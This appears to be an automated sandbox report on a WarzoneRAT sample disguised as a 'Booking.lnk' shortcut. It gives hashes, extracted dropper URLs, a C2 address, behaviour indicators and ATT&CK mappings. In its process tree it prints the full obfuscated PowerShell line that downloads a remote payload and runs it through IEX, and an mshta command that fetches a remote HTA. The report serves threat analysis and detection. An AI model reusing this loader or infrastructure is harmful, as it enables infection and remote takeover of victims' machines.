warzonerat | ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2

General

Target

Booking.lnk
Size

1KB
MD5

c19da592366d6c173dee901add093e8e
SHA1

ddd038c49bee36557cd203b581948e98a5e787a1
SHA256

ab915bb1e45aba4cbbb762e4bac31510539b4a418d8466839bf6e4c1b40b87a2
SHA512

7d9c0d3aa4b8907598f3c0982b32cc35d9afb816de8e350aefac3993cfbcd0e2b3c84ce59d99b9de239b20a10179ea6db9370aa53c89b3c3a1e4c05db8bdd7b3

Score

10^/10

warzonerat infostealer persistence rat

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt

Extracted

Family

warzonerat

C2

103.147.184.73:5719

Signatures

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

Warzone RAT Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/1992-73-0x0000000000400000-0x000000000041D000-memory.dmp	warzonerat
behavioral1/memory/1992-74-0x0000000000405738-mapping.dmp	warzonerat
behavioral1/memory/1992-76-0x0000000000400000-0x000000000041D000-memory.dmp	warzonerat

Blocklisted process makes network request 5 IoCs

Processes:

mshta.exepowershell.exe

flow pid process

6 1464 mshta.exe
8 1464 mshta.exe
10 1464 mshta.exe
12 1896 powershell.exe
14 1896 powershell.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112
Loads dropped DLL 1 IoCs

Processes:

pid process

1616

flow	pid	process
6	1464	mshta.exe
8	1464	mshta.exe
10	1464	mshta.exe
12	1896	powershell.exe
14	1896	powershell.exe

pid	process
1616

Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1896 set thread context of 1992 1896 powershell.exe aspnet_compiler.exe

description	pid	process	target process
PID 1896 set thread context of 1992	1896	powershell.exe	aspnet_compiler.exe

Drops file in Program Files directory 2 IoCs

Processes:

aspnet_compiler.exe

description	ioc	process
File created	C:\Program Files\Microsoft DN1\sqlmap.dll	aspnet_compiler.exe
File created	C:\Program Files\Microsoft DN1\rdpwrap.ini	aspnet_compiler.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

mshta.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 0f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec53726187760b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900000053000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c009000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b06010505070303140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e31d000000010000001000000099949d2179811f6b30a8c99c4f6b42260300000001000000140000002796bae63f1801e277261ba0d77770028f20eee420000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	mshta.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob = 19000000010000001000000063664b080559a094d10f0a3c5f4f62900300000001000000140000002796bae63f1801e277261ba0d77770028f20eee41d000000010000001000000099949d2179811f6b30a8c99c4f6b4226140000000100000014000000d2c4b0d291d44c1171b361cb3da1fedda86ad4e309000000010000002a000000302806082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030353000000010000004800000030463021060b6086480186fd6d0107170330123010060a2b0601040182373c0101030200c03021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c00b000000010000005200000047006f00200044006100640064007900200043006c00610073007300200032002000430065007200740069006600690063006100740069006f006e00200041007500740068006f00720069007400790000000f00000001000000140000005d82adb90d5dd3c7e3524f56f787ec537261877620000000010000000404000030820400308202e8a003020102020100300d06092a864886f70d01010505003063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479301e170d3034303632393137303632305a170d3334303632393137303632305a3063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f7269747930820120300d06092a864886f70d01010105000382010d00308201080282010100de9dd7ea571849a15bebd75f4886eabeddffe4ef671cf46568b35771a05e77bbed9b49e970803d561863086fdaf2ccd03f7f0254225410d8b281d4c0753d4b7fc777c33e78ab1a03b5206b2f6a2bb1c5887ec4bb1eb0c1d845276faa3758f78726d7d82df6a917b71f72364ea6173f659892db2a6e5da2fe88e00bde7fe58d15e1ebcb3ad5e212a2132dd88eaf5f123da0080508b65ca565380445991ea3606074c541a572621b62c51f6f5f1a42be025165a8ae23186afc7803a94d7f80c3faab5afca140a4ca1916feb2c8ef5e730dee77bd9af67998bcb10767a2150ddda058c6447b0a3e62285fba41075358cf117e3874c5f8ffb569908f8474ea971baf020103a381c03081bd301d0603551d0e04160414d2c4b0d291d44c1171b361cb3da1fedda86ad4e330818d0603551d230481853081828014d2c4b0d291d44c1171b361cb3da1fedda86ad4e3a167a4653063310b30090603550406130255533121301f060355040a131854686520476f2044616464792047726f75702c20496e632e3131302f060355040b1328476f20446164647920436c61737320322043657274696669636174696f6e20417574686f72697479820100300c0603551d13040530030101ff300d06092a864886f70d01010505000382010100324bf3b2ca3e91fc12c6a1078c8e77a03306145c901e18f708a63d0a19f98780116e69e4961730ff3491637238eecc1c01a31d9428a431f67ac454d7f6e5315803a2ccce62db944573b5bf45c924b5d58202ad2379698db8b64dcecf4cca3323e81c88aa9d8b416e16c920e5899ecd3bda70f77e992620145425ab6e7385e69b219d0a6c820ea8f8c20cfa101e6c96ef870dc40f618badee832b95f88e92847239eb20ea83ed83cd976e08bceb4e26b6732be4d3f64cfe2671e26111744aff571a870f75482ecf516917a002126195d5d140b2104ceec4ac1043a6a59e0ad595629a0dcf8882c5320ce42b9f45e60d9f289cb1b92a5a57ad370faf1d7fdbbd9f	mshta.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid process

1896 powershell.exe
1896 powershell.exe
Suspicious behavior: LoadsDriver 3 IoCs

Processes:

pid process

1616
1616
1616
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exeaspnet_compiler.exe

description pid process

Token: SeDebugPrivilege 1896 powershell.exe
Token: SeDebugPrivilege 1992 aspnet_compiler.exe
Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

aspnet_compiler.exe

pid process

1992 aspnet_compiler.exe
1992 aspnet_compiler.exe
1992 aspnet_compiler.exe

pid	process
1896	powershell.exe
1896	powershell.exe

pid	process
1616
1616
1616

description	pid	process
Token: SeDebugPrivilege	1896	powershell.exe
Token: SeDebugPrivilege	1992	aspnet_compiler.exe

pid	process
1992	aspnet_compiler.exe
1992	aspnet_compiler.exe
1992	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 18 IoCs

Processes:

cmd.exemshta.exepowershell.exe

description	pid	process	target process
PID 2028 wrote to memory of 1464	2028	cmd.exe	mshta.exe
PID 2028 wrote to memory of 1464	2028	cmd.exe	mshta.exe
PID 2028 wrote to memory of 1464	2028	cmd.exe	mshta.exe
PID 1464 wrote to memory of 1896	1464	mshta.exe	powershell.exe
PID 1464 wrote to memory of 1896	1464	mshta.exe	powershell.exe
PID 1464 wrote to memory of 1896	1464	mshta.exe	powershell.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe
PID 1896 wrote to memory of 1992	1896	powershell.exe	aspnet_compiler.exe

C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\Booking.lnk
1⤵
- Suspicious use of WriteProcessMemory
PID:2028

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "https://ia801509.us.archive.org/29/items/enc-kkkkkkkkkkkooooooookkkkkkkkkkk-2435467568790/Enc_kkkkkkkkkkkooooooookkkkkkkkkkk_2435467568790.txt"
2⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
PID:1464

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY='https://ia601504.us.archive.org/1/items/all-kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk/ALL_kkkkkkkkkkkkooooooooookkkkkkkkkkkkkkk.txt';$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDHING'.Replace('SDFGDHFJGKHFGHDFGDHJGKHFJGDHFSHGDHJKGFHGDHFSHGDJFKJGKJKHFJGDH','LOADSTR');$RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGDM.NEDTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Replace('EFSRGDTHYFUGKYFTDRSEASGRDHTFYUGKKGYFTDHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK = '(NAFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFYGUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUHIUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTDYFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDHGFJGKHLJKHJGHFGFGDHFGHK($S');$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($ESTRDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');
3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1896

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
4⤵
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1992

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

3

T1112

Install Root Certificate

1

T1130

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Program Files\Microsoft DN1\sqlmap.dll
MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
memory/1464-61-0x0000000000000000-mapping.dmp

Download
memory/1896-69-0x000000001AB34000-0x000000001AB36000-memory.dmp

Filesize
8KB

Download
memory/1896-70-0x000000001C230000-0x000000001C231000-memory.dmp

Filesize
4KB

Download
memory/1896-65-0x000000001ABB0000-0x000000001ABB1000-memory.dmp

Filesize
4KB

Download
memory/1896-66-0x0000000002540000-0x0000000002541000-memory.dmp

Filesize
4KB

Download
memory/1896-67-0x0000000002460000-0x0000000002461000-memory.dmp

Filesize
4KB

Download
memory/1896-68-0x000000001AB30000-0x000000001AB32000-memory.dmp

Filesize
8KB

Download
memory/1896-62-0x0000000000000000-mapping.dmp

Download
memory/1896-64-0x0000000002500000-0x0000000002501000-memory.dmp

Filesize
4KB

Download
memory/1896-71-0x000000001C3F0000-0x000000001C3F1000-memory.dmp

Filesize
4KB

Download
memory/1896-72-0x00000000026C0000-0x00000000026CE000-memory.dmp

Filesize
56KB

Download
memory/1992-73-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/1992-74-0x0000000000405738-mapping.dmp

Download
memory/1992-75-0x00000000765F1000-0x00000000765F3000-memory.dmp

Filesize
8KB

Download
memory/1992-76-0x0000000000400000-0x000000000041D000-memory.dmp

Filesize
116KB

Download
memory/2028-60-0x000007FEFC411000-0x000007FEFC413000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads